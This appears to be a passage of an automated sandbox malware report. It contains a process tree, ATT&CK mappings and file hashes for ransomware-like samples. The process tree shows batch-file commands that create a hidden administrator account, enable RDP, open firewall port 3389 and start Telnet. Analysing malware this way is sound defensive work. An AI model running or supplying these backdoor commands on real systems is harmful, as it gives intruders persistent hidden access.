    - Suspicious use of SetWindowsHookEx
    PID:18580
- - C:\Users\Admin\Downloads\ac\mssql2.exe
    "C:\Users\Admin\Downloads\ac\mssql2.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:18644
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\ac\Shadow.bat" "
    3⤵
    - System Location Discovery: System Language Discovery
    PID:18852
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\ac\systembackup.bat" "
    3⤵
    - System Location Discovery: System Language Discovery
    PID:18896
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value | Find "="
      4⤵
      System Location Discovery: System Language Discovery
      PID:25352
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:25648
    - - C:\Windows\SysWOW64\find.exe
        
        Find "="
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:19032
  - - C:\Windows\SysWOW64\net.exe
      net user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"
      4⤵
      System Location Discovery: System Language Discovery
      PID:19544
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:19556
  - - C:\Windows\SysWOW64\net.exe
      net localgroup Administrators systembackup /add
      4⤵
      System Location Discovery: System Language Discovery
      PID:19532
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup Administrators systembackup /add
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:19484
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value | Find "="
      4⤵
      System Location Discovery: System Language Discovery
      PID:19480
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:19468
    - - C:\Windows\SysWOW64\find.exe
        
        Find "="
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:19452
  - - C:\Windows\SysWOW64\net.exe
      net localgroup "Remote Desktop Users" systembackup /add
      4⤵
      Remote Service Session Hijacking: RDP Hijacking
      System Location Discovery: System Language Discovery
      PID:19548
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Remote Desktop Users" systembackup /add
        5⤵
        Remote Service Session Hijacking: RDP Hijacking
        System Location Discovery: System Language Discovery
        
        PID:19416
  - - C:\Windows\SysWOW64\net.exe
      net accounts /forcelogoff:no /maxpwage:unlimited
      4⤵
      System Location Discovery: System Language Discovery
      PID:19212
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 accounts /forcelogoff:no /maxpwage:unlimited
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:19244
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:19428
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:19256
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v systembackup /t REG_DWORD /d 0x0 /f
      4⤵
      Hide Artifacts: Hidden Users
      System Location Discovery: System Language Discovery
      PID:19424
  - - C:\Windows\SysWOW64\attrib.exe
      attrib C:\users\systembackup +r +a +s +h
      4⤵
      Sets file to hidden
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:19268
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add portopening TCP 3389 "Remote Desktop"
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      PID:19280
  - - C:\Windows\SysWOW64\sc.exe
      sc config tlntsvr start=auto
      4⤵
      Launches sc.exe
      System Location Discovery: System Language Discovery
      PID:19348
  - - C:\Windows\SysWOW64\net.exe
      net start Telnet
      4⤵
      System Location Discovery: System Language Discovery
      PID:19248
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start Telnet
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:19264
- - C:\Users\Admin\Downloads\ac\EVER\SearchHost.exe
    "C:\Users\Admin\Downloads\ac\EVER\SearchHost.exe"
    3⤵
    - Executes dropped EXE
    - Enumerates connected drives
    - System Location Discovery: System Language Discovery
    - Suspicious use of SendNotifyMessage
    - Suspicious use of SetWindowsHookEx
    PID:18960

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:3444

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
1⤵
PID:1672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4080

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:16000

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Windows Management Instrumentation

T1047

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Direct Volume Access

T1006

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Hidden Users

T1564.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Safe Mode Boot

T1562.009

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Subvert Trust Controls

T1553

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Windows Credential Manager

T1555.004

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Password Policy Discovery

T1201

Peripheral Device Discovery

T1120

Permission Groups Discovery

T1069

Local Groups

T1069.001

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Remote Service Session Hijacking

T1563

RDP Hijacking

T1563.002

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Common Files\microsoft shared\ClickToRun\AppvIsvSubsystems32.dll.id-11F6F792.[[email protected]].ncov

Filesize
2.7MB

MD5
8b5bf607e5a8ef374c068c4cd2327dbb

SHA1
6e373244f01eb2b47f8a08f070e13fbd584fabf0

SHA256
f55a7af3fc00cfbcc5455447ec2bdadc28b7bcef3633d7fa7ff09ad9200c0437

SHA512
79e658336e0cc36a54ca4e3373c62a3c7ff8cfd50e63727936bf3c60984cd7771e06f50ed566dd94afe768d9afae729f9f53929a1dffb73993490d788ff71f2b

Download Submit
C:\Program Files\Google\Chrome\Application\133.0.6943.60\dxcompiler.dll

Filesize
24.6MB

MD5
19f587d2ffb5172c4c1b2f77375f5130

SHA1
18652a50c17bc4fb62e0a08b238084b9e917133e

SHA256
44d2415f113b095c5cfaca48efbac8bfc89da66bd9682598ecad0dbcde3471f0

SHA512
2bf77b3819a73648b5ae0812f1c4642ac465287c5ac79e33d8395e8fa94d2900b828dc45194e29cc3711555bd8bfc45daf8198902bc1a5f4324f13fa62eb5974

Download Submit
C:\Program Files\Google\Chrome\Application\133.0.6943.60\vk_swiftshader.dll

Filesize
5.1MB

MD5
3de32c2bcfefa322e0ac242dcf5875fd

SHA1
503766667dd52571a447e6622285e328f93573ea

SHA256
b469fb591d5064f5d7f86ade165b0565b7d325e969fe0eaab6c757443539ac31

SHA512
fa17bf4819c4eef9cc61dffac87dc9cd56ca9022bdcc3f478a2e880881cc24755649de48dd2441ecd9eddebb3448639e02a023b911cd4b20938a42a4eda9abdb

Download Submit
C:\Program Files\Google\Chrome\Application\chrome.exe

Filesize
3.2MB

MD5
eb3385cf380c8d890240ba91decc7b74

SHA1
986ebdee92f11543487f364f9fce3a3beebe5e26

SHA256
540cd6fba25c7dfd9f324d4170e3b2223bd733dcd494ce35257a5871a4923aa0

SHA512
ef97cdb56a897feb7b775560c18abdd7f62e8fb6cba8f01ed5e031626e2e7f21b749b1f7fcf3d376e72c27e68aa4a9cf08e80ef95b977f4c80445b116d82ca2c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-active.pma

Filesize
1024KB

MD5
34c29bdb9e41b1f47f2d2786762c12ec

SHA1
4075131b18c3487e3e848361e112009c897629c7

SHA256
67ee11b51cd6f637795e31ab501f135ed595c8459bce885735f08b0418513a17

SHA512
ca3a978798e77b2ced27b379f38e935ef18beaa7ea23e34270a9af20b37e1b1c5edf9478606311cf1acabd83992766cb3da8444de9394c674d5955bdbc53c0d0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
343e8f80512c42d1cb05745585911887

SHA1
edf80dec647dd16311682d7baf394e54d5019497

SHA256
f4fae0103b0e76dc0035eea06ea846e849f9fa146cbb37a25960c52993d4ab0a

SHA512
51e8eab5b21dba1130ebc98e994dcf2d3ecd3b77d8953601c7af672a71bfb7fff25b3042d26cac1cd6d4c6f0f12f749051ebcad1553c960e98b6c3c370f76aea

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00001b

Filesize
1.0MB

MD5
055d1462f66a350d9886542d4d79bc2b

SHA1
f1086d2f667d807dbb1aa362a7a809ea119f2565

SHA256
dddf7894b2e6aafa1903384759d68455c3a4a8348a7e2da3bd272555eba9bec0

SHA512
2c5e570226252bdb2104c90d5b75f11493af8ed1be8cb0fd14e3f324311a82138753064731b80ce8e8b120b3fe7009b21a50e9f4583d534080e28ab84b83fee1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
4e6569cd2de7cf0d6b0ba1a6c94e33e6

SHA1
584a7d7a264be601889f56ac91512d738447b03a

SHA256
a194ce33ffb75faab6b41f52545a3abc49823afefff18ca76e2848de566ab968

SHA512
1459c973197b6000284f9eea83ff04c163f7ae02c22f83ed22c495434c67fabdd14d9e04db62c7a78e4eb570803874ed24ba1130a7f01cc39645d2e48c2057d7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
9b947e7785418b066ef3baf70c392aa4

SHA1
b7082d204155e352455703ffc7f2566308210f30

SHA256
a290c90f323b0306f9abd1b37926e6d47c30e416efdd13d993f5ab216c7cc5c4

SHA512
b14abdf757ceb2b0570d19bb6e75b4cab7cc7c050b6195d4d35523a08afdc174cc502a03d371168e6d0eee4477668dedd23c3a19a497f4745c9a7e0d324efef4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
3311118df3f76fc82c6fd38c2fb12972

SHA1
b9a5b0a6b3939f67d73dbd0dbdf8d7a2158a9511

SHA256
1f1c642ed984d824e15af2e71013883f5fc83ba8243500fdef39477c6ad7c5a8

SHA512
08741b0371a9c13969cca236236d848daa3c1890c725b57d09acacf0c25519664eb22aea589b6d24c53000f68955fdcc8fc6a95fd7f72a489b1a08cdb44f7ad2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
3KB

MD5
a95e1786ddb93e47d59c5d6c37c85c76

SHA1
6a5050511c5f027bff88da134f22ba4842953b84

SHA256
34101ded14350192a48a9b9d1339cd554278709a25a0de842dffbcbff5ffdb2a

SHA512
98cfb273694b64f711d11175e0a8a54da6e6a2201cbd99cc73de260298eabd03fd798e59352c76a05a37c9d40aa09b3f3895b3a80b346127cccb3c79562830ea

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
11KB

MD5
7571054e4f195362200c4cbac9bf4153

SHA1
5c3dca9d9d986848461b6d22c58d95b21bbb948b

SHA256
50fe2ec041d6eb725327450b81e01fb04d4b3455f89c25b20ebd6532acc469ec

SHA512
6627dfe5f829db353cf646602db273648dc3b2c0d4c2c6caca921ffb9586f21ec59e2e132f5bad8fafcef794537aa3235225badd1fdb940b6ec816f3a07541b5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
11KB

MD5
a714f699561cc5d5fbc0772f88321e16

SHA1
861146d3eb8c564fd8bd6586557ead3e8607d6e9

SHA256
1b2f2abd55b903fc4b4d8e906e06cce46a3ca56b8d9f0a504dc98e63131f49f9

SHA512
3131f46b6fc4d1791c51773589d43c7bf7274e54f14cd80fdf5b2ddaa65fa2c3044bc4ab67d130774c6303b0c1a0ab1e496e793902a5b0c02a8d353f0d0c3f71

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
11KB

MD5
28690d86f6188ed1bb52ed6ec6031913

SHA1
ae15d4d07b0256bcee395d6a1e6e4df5406c606b

SHA256
76f5e6e1b6bcd470d6d01e5f154db48091e36ea318363e9f224c8cc16399367b

SHA512
7a7a2c688ef79c0b1538e76195f6b0e240ea94f900e59271400d260e79ca782314aa985fa1c758695cc6b65242d5492c1fc1e2e7a424318e7bd48f8c3524836d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
11KB

MD5
9dd5a740cff08ded8c72f1446bb0e24a

SHA1
02dfa91844f74fd660b76e9829f9d55c2c83d9fc

SHA256
1839c497ac7e3c6ee9c69050ea59863fcc4ec3f5547d93a6cbc5e2fdeb85698f

SHA512
b5c3843dbf39bff9c540e528c9bffb4d84f0bdfb4b9e4cf539b9964a1cffd171466b4f660e876e3b324fdacca05fcc48aacd5318d100a4f27c2c19583d553f5c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
11KB

MD5
69b58e63daa90a1a8e89fbfbb8996c73

SHA1
9ac40ea1b9e730ab8317be003aed0a1323b046ce

SHA256
54b970a31900aa1bd8c1956a428571cc6eec3410235a340e79b5ed11c2a8cfb6

SHA512
cb41f0beb9c26ef555fefba4ea33577883aad0550b6998c61fb47853aa16075678df2c8dc964947cb3067a83c956cb62f88b267bd8888c81237bf9548832b4f7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
11KB

MD5
f83b8a447f7af2256f8b95c1f80d9de9

SHA1
eb1821f76148b9f3f7f7219e5d5dead5bb95605a

SHA256
9675ee3681c4043c8e62a0e2735a7b47c77a53104031eba17529c7a57a31ffbd

SHA512
835372bc16211aa3c880171a86406cdf595f4df578610f546f4dab6fa4f06c4324bf63b8d4a75e1f723af1970c57940419a2573e61d6877c09b4ab41e8b5df9b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
2d357dc982112eb88d62bd5b2b2166b4

SHA1
9168572b177bf7882baa04739779f7571fd275ca

SHA256
93e277b83c14c572cfb40cd9a62c50bdc55ebf1c50d7953f3340cf38c2de0159

SHA512
35d59b503ddb0cb2d775e1602f1b6821fb6333c8aa4ee3d53a4f77706e101a6216c5cf1d334db0c206457a7c00677b6d76e176b64ae7cf8b1fabf1d37d7a1b01

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
ed2bddc91ebff851674a153325d7253f

SHA1
a8515559e9aa58bcc4186e93b10da98e3984e7c8

SHA256
0d0ffe5543401334404ed30074c7a016d51ab10df5c6d425841561a98946511a

SHA512
ae8ba199f87f6ef7166bab5e6eb1cf8e8ca1c85fbbd8597790d739dd5c086b8353565a179469abf9e5422ce6d8fb6fa6aeb79f193247a3da918c203b5de87b29

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
42e4082f52a95e2491d95fe07ae2fad1

SHA1
88cdfa3b7aac52d2f247b870ef31157186d562a9

SHA256
67f089248c1b0f3bfe51e2e73cd39c6dc98cc852f19a0bed71f4d5e8599ddf71

SHA512
582be62a3ec721620d88dcea07298c4280e1e2bf6406de21aa21d0344dd556ee04978acfe9b8480d32222810e4be4d2a2be52aea407be2d3d416752c4661515d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
72B

MD5
ca5d08ba8ccbba647d51846f7f50de78

SHA1
4fb1a4bd3536197a51a8e9cf8f492ebeeba68c7c

SHA256
fcd0398c0f659aa1b396f6880d268d2a8227c8ff7f460e0ad108073989d18626

SHA512
a298eea34e1b72b4f9123a0934307af89a2b8d08119d34711bbc28ab952adfd82766bf7ae41f4758c661807a3181a26cfe393e5234ac3ae7b6910e7b91958d21

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe57d4c5.TMP

Filesize
48B

MD5
7aeae1cf9fb20662d81747fbb03d3669

SHA1
627330254d30b34f93675690b9cd39f30b85a930

SHA256
117ca2f4cec205df8f4e9f20eb2a1f68606526f9decfbd0a64f0e750998db5cf

SHA512
86a687c9bc79c8edc9ff2e146651bba6b997a9d90cf2f4e4ecb69db614da50354c06988882d94ba9595b49028b81bee3f07464407c53fd8b6f0a3c02c09327d9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\b5a2be2e-761f-44c0-9966-5af03450bfd6.tmp

Filesize
11KB

MD5
7a210817ffabf6bff7211e653c452736

SHA1
bb5c46e03295a9e7f87732b06efacd4ec112dc8b

SHA256
b402ef65126d32f0cb0c60f7ef545a0e25f2530805bbca2e8d1ba3d12090eac4

SHA512
8930c91b2545eaa6e8143e598843bbb7c9941c7c798bbd148aa44d4f999ea911c148272fdee3d2f2cc96d501b0327428e752b66960bc0daae412db7acc53ef9d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
79KB

MD5
a9705d5c7869a3d4b02e7315a1aaeeee

SHA1
a554448b26cb11f283f0d66cfaec845be24acd12

SHA256
f0dabef0f2f76607ceeb58e70e30ececd8c5e05626f2dd77ea0c4c0ca3e7e1d0

SHA512
0f72b1cf85f544b8f159a9dcdd6821a42d44fb1ca052d02eddd759b87f756a9927c2f5c1b73506c21a675450f2a3157c8a8a065e4ba88c8386ed0a04bed7796a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
81KB

MD5
e56e82ea02cf889fc16c64c244ee8e7a

SHA1
266d798c23c45007a3ab957181ed1567600ac550

SHA256
3e8e09a0ecc9641aa9c18b4af2b70ed58c9074a90d42ef3b8407e9510ed93054

SHA512
629071b05a23ac15dff4b8000d373f36b8908be033733ca4c5d9aed0544e021dc98b6187c1af38b5400b684b119b11dbc4aa20d97af945cf7286cb47ec46359b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
80KB

MD5
7e300faa68c8f5f65215b38f4c532cea

SHA1
d3e4a504839fe6fb457a9264a4a7c22f92bcbd45

SHA256
6683357068446e9319c0f5e5f2227cdd9482187dfbe973a16dd607361830b30f

SHA512
d5dc6d5f9796f6e514f3f3388d69b64af1954411a548bc18300d93b659e2700761e83dba059a2450cd0b027df2a83eaddb7e2f8361ce00cdb09081bf4131b563

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\first_party_sets.db

Filesize
48KB

MD5
850efe88508753c95f952519b15b037a

SHA1
d8939bae626035dcacde7eec17a8b30733f43998

SHA256
181200c2094846cb32d846fd1e26f3f1490c22c2358649ea39656d4a67f1916e

SHA512
2d3c8f210916257fb45756831baf335c001514d3962d0315957cf84d87c8e9dea5d6148d4501bd93c2dfb908818ad408e99a85dd36b22adcd8459be000b324a4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms

Filesize
5KB

MD5
d92b27bbbf52750a1ac443198379cbde

SHA1
282aedcc633bb003eb3fa36dbb5c22fa25e666d7

SHA256
2614e0c4742d61dca0ef7e676e76df86f48b8ea0b168e311fabbc7d394e3d997

SHA512
86a4da151dd81da353b05339a448bcd4cad87955df9edec02b32f24d473abd55be06fef302b29e56a15fd5f6fa738de2f2b6352b1e050f20e46d5a93ad408f69

Download Submit
C:\Users\Admin\Downloads\CoronaVirus.exe:Zone.Identifier

Filesize
123B

MD5
330bc098f55e59866cbab3004e182c63

SHA1
3445dfea8dd9588108600502eefbdb9d258b3ba3

SHA256
e585dedb5c6610d96dc5b838ef24c0a5ff39dd99f61f60dee19feac824a68501

SHA512
64ff7ce754d00ba31a2a1be655baba9796548e0800ec224494b8d51ee8fb706018f968d8a92f700aafa7b60d424b0e228fda6075bfc07782e9437f3243a37dbb

Download Submit
C:\Users\Admin\Downloads\CryptoWall.exe:Zone.Identifier

Filesize
235B

MD5
6a1ae82cdf0266eeec4d8aac7bea8e23

SHA1
8a9cb7f87f425a8081a48d117eecba4faefdb0ff

SHA256
5b1a59c568e4d36e878fa7a949dc15065c06d1ef050b6c7fc363abb8e50e6048

SHA512
b7612815ea103684c15d87a4b64ebad95a2b1fd589d6f9d1b14dc48f76e3331c0f8234571d8c9571d349f27e24f748f918dc8162fac58726a7f6701c99da7b3e

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 410283.crdownload

Filesize
261KB

MD5
7d80230df68ccba871815d68f016c282

SHA1
e10874c6108a26ceedfc84f50881824462b5b6b6

SHA256
f4234a501edcd30d3bc15c983692c9450383b73bdd310059405c5e3a43cc730b

SHA512
64d02b3e7ed82a64aaac1f74c34d6b6e6feaac665ca9c08911b93eddcec66595687024ec576e74ea09a1193ace3923969c75de8733859835fef45335cf265540

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 461770.crdownload

Filesize
132KB

MD5
919034c8efb9678f96b47a20fa6199f2

SHA1
747070c74d0400cffeb28fbea17b64297f14cfbd

SHA256
e036d68b8f8b7afc6c8b6252876e1e290f11a26d4ad18ac6f310662845b2c734

SHA512
745a81c50bbfd62234edb9788c83a22e0588c5d25c00881901923a02d7096c71ef5f0cd5b73f92ad974e5174de064b0c5ea8044509039aab14b2aed83735a7c4

Download Submit
C:\Users\Admin\Downloads\ac\EVER\1saas\LogDelete.exe

Filesize
1.3MB

MD5
6ca170ece252721ed6cc3cfa3302d6f0

SHA1
cf475d6e172b54633479b3587e90dd82824ff051

SHA256
f3a23e5e9a7caefcc81cfe4ed8df93ff84d5d32c6c63cdbb09f41d84f56a4126

SHA512
65b6ceee14b6b5bd7baee12c808d02aeb3af5f5e832d33dcdb32df44c1bfbc1896678dcc517cf90377020ba64af2ccad1790d58f67531196bbd5222f07694c1d

Download Submit
C:\Users\Admin\Downloads\ac\EVER\SearchHost.exe

Filesize
1.6MB

MD5
8add121fa398ebf83e8b5db8f17b45e0

SHA1
c8107e5c5e20349a39d32f424668139a36e6cfd0

SHA256
35c4a6c1474eb870eec901cef823cc4931919a4e963c432ce9efbb30c2d8a413

SHA512
8f81c4552ff561eea9802e5319adcd6c7e5bdd1dc4c91e56fda6bdc9b7e8167b222500a0aee5cf27b0345d1c19ac9fa95ae4fd58d4c359a5232bcf86f03d2273

Download Submit
C:\Users\Admin\Downloads\ac\dkgqocbwgndcpsaz.sys

Filesize
674KB

MD5
b2233d1efb0b7a897ea477a66cd08227

SHA1
835a198a11c9d106fc6aabe26b9b3e59f6ec68fd

SHA256
5fd17e3b8827b5bb515343bc4066be0814f6466fb4294501becac284a378c0da

SHA512
6ca61854db877d767ce587ac3d7526cda8254d937a159fd985e0475d062d07ae83e7ff4f9f42c7e1e1cad5e1f408f6849866aa4e9e48b29d80510e5c695cee37

Download Submit
C:\Users\Admin\Downloads\ac\mssql.exe

Filesize
10.2MB

MD5
f6a3d38aa0ae08c3294d6ed26266693f

SHA1
9ced15d08ffddb01db3912d8af14fb6cc91773f2

SHA256
c522e0b5332cac67cde8fc84080db3b8f2e0fe85f178d788e38b35bbe4d464ad

SHA512
814b1130a078dcb6ec59dbfe657724e36aa3db64ed9b2f93d8559b6a50e512365c8596240174141d6977b5ddcf7f281add7886c456dc7463c97f432507e73515

Download Submit
C:\Users\Admin\Downloads\ac\mssql2.exe

Filesize
6.7MB

MD5
f7d94750703f0c1ddd1edd36f6d0371d

SHA1
cc9b95e5952e1c870f7be55d3c77020e56c34b57

SHA256
659e441cadd42399fc286b92bbc456ff2e9ecb24984c0586acf83d73c772b45d

SHA512
af0ced00dc6eeaf6fb3336d9b3abcc199fb42561b8ce24ff2e6199966ad539bc2387ba83a4838301594e50e36844796e96c30a9aa9ad5f03cf06860f3f44e0fa

Download Submit
C:\Users\Admin\Downloads\ac\nc123.exe

Filesize
125KB

MD5
597de376b1f80c06d501415dd973dcec

SHA1
629c9649ced38fd815124221b80c9d9c59a85e74

SHA256
f47e3555461472f23ab4766e4d5b6f6fd260e335a6abc31b860e569a720a5446

SHA512
072565912208e97cc691e1a102e32fd6c243b5a3f8047a159e97aabbe302bddc36f3c52cecde3b506151bc89e0f3b5acf6552a82d83dac6e0180c873d36d3f6b

Download Submit
memory/1616-3869-0x0000000000400000-0x000000000056F000-memory.dmp

Filesize
1.4MB

Download
memory/1616-544-0x0000000000400000-0x000000000056F000-memory.dmp

Filesize
1.4MB

Download
memory/1616-534-0x0000000000400000-0x000000000056F000-memory.dmp

Filesize
1.4MB

Download
memory/2888-476-0x0000000000AC0000-0x0000000000AE5000-memory.dmp

Filesize
148KB

Download
memory/2888-477-0x0000000000AC0000-0x0000000000AE5000-memory.dmp

Filesize
148KB

Download
memory/4212-486-0x00000000005A0000-0x00000000005C5000-memory.dmp

Filesize
148KB

Download
memory/14252-27167-0x0000000002580000-0x00000000025B2000-memory.dmp

Filesize
200KB

Download
memory/14252-27218-0x0000000002600000-0x000000000262B000-memory.dmp

Filesize
172KB

Download
memory/14252-27208-0x0000000002600000-0x000000000262B000-memory.dmp

Filesize
172KB

Download
memory/14252-27294-0x0000000004C30000-0x0000000004CC2000-memory.dmp

Filesize
584KB

Download
memory/14252-27293-0x0000000004D10000-0x00000000052B6000-memory.dmp

Filesize
5.6MB

Download
memory/14252-27206-0x0000000002600000-0x000000000262B000-memory.dmp

Filesize
172KB

Download
memory/14252-27204-0x0000000002600000-0x000000000262B000-memory.dmp

Filesize
172KB

Download
memory/14252-27202-0x0000000002600000-0x000000000262B000-memory.dmp

Filesize
172KB

Download
memory/14252-27200-0x0000000002600000-0x000000000262B000-memory.dmp

Filesize
172KB

Download
memory/14252-27198-0x0000000002600000-0x000000000262B000-memory.dmp

Filesize
172KB

Download
memory/14252-27192-0x0000000002600000-0x000000000262B000-memory.dmp

Filesize
172KB

Download
memory/14252-27186-0x0000000002600000-0x000000000262B000-memory.dmp

Filesize
172KB

Download
memory/14252-27182-0x0000000002600000-0x000000000262B000-memory.dmp

Filesize
172KB

Download
memory/14252-27178-0x0000000002600000-0x000000000262B000-memory.dmp

Filesize
172KB

Download
memory/14252-27295-0x0000000005330000-0x000000000533A000-memory.dmp

Filesize
40KB

Download
memory/14252-27176-0x0000000002600000-0x000000000262B000-memory.dmp

Filesize
172KB

Download
memory/14252-27174-0x0000000002600000-0x000000000262B000-memory.dmp

Filesize
172KB

Download
memory/14252-27213-0x0000000002600000-0x000000000262B000-memory.dmp

Filesize
172KB

Download
memory/14252-27172-0x0000000002600000-0x000000000262B000-memory.dmp

Filesize
172KB

Download
memory/14252-27210-0x0000000002600000-0x000000000262B000-memory.dmp

Filesize
172KB

Download
memory/14252-27195-0x0000000002600000-0x000000000262B000-memory.dmp

Filesize
172KB

Download
memory/14252-27196-0x0000000002600000-0x000000000262B000-memory.dmp

Filesize
172KB

Download
memory/14252-27170-0x0000000002600000-0x000000000262B000-memory.dmp

Filesize
172KB

Download
memory/14252-27191-0x0000000002600000-0x000000000262B000-memory.dmp

Filesize
172KB

Download
memory/14252-27189-0x0000000002600000-0x000000000262B000-memory.dmp

Filesize
172KB

Download
memory/14252-27169-0x0000000002600000-0x000000000262B000-memory.dmp

Filesize
172KB

Download
